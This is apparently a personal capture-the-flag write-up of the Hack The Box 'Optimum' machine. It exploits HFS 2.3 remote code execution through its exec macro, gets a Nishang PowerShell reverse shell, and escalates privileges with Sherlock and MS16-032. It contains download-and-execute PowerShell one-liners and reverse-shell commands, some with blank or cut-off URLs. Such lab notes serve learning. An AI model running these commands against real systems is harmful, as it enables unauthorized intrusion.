HTB Optimum Write-up (Windows) - Powershell Download String, HFS File Server 2.3 Vuln, Sherlock

What I learned:

  • 1 liner

IEX(New-Object Net.WebClient).downloadString('')

HTTP Enum:

HttpFileServer 2.3

Searchsploit result:

This exploit worked but IPPSec's walkthrough video does it in better way.

The HFS file server uses rejetto language

The 2.3 version is vulnerable for remote code execution.

We can execute command with following syntax accoding to the wiki page:

exec | A
ask system to run file A, eventually with parameters. If you need to use the pipe, then use macro quoting.
Optional parameter out will let you capture the console output of the program in the variable specified by name.
Optional parameter timeout will specify the max number of seconds the app should be left running.
Example: {.exec|notepad.}

We can confirm this by typing:{.exec|ping IP_ADDRESS}

and set up the tcpdump to listen for any command execution: (NEW)

tcpdump -i tun0 

This shows that it's exploitable.

Windows have 32bit and 64 bit versions. For file systems:

  1. C:\windows\System32

  2. c:\Windows\SysWow64 -> this is still 32bit

  3. C:\Windows\SysNative -> this is 64 bit

So we will try the 64 bit.{.exec|c:Windows\SysNative\WindowsPowershell\v1.0\powershell.exe ping IP.}to test if the ping works with the powershell method.

Once confirmed, we can use a toolset called "Nishang" > shells > PoweShellTcp.ps1 and copy it to somewhere else as we need to modify it a bit.

At the end of the script, we need to add one sentence:

Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444

And run nc for that port specified.

Finally, we can download the file on the File Server by typing:{.exec|c:Windows\SysNative\WindowsPowershell\v1.0\powershell.exe%20IEX(New-Object%20Net.WebClient).downloadString(%27http://}

And now we get the usershell!

With this method, we can download a priv esc scripts?


Prev Esc

Since we are already running powershell on the server, let's use a native tool called sherlock.

Edit the Sherlock script, and add a method we want to use at the end of the script:

In this case, Find-AllVulns

IEX(New-Object Net.WebClient).downloadString('')

We see it's vulnerable to 3 exploits!

  • MS16-032, MS16-034, MS16-135

Try MS16-032

At the end of the script, edit

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')"

transfer over the TCP reverse shell Ps1 script (nishang) to the same directory and edit the port to something other the last one and start the python http server to host them

IEX(New-Object Net.WebClient).downloadString('')

Run the nc on the port before running it.

It worked!

Last updated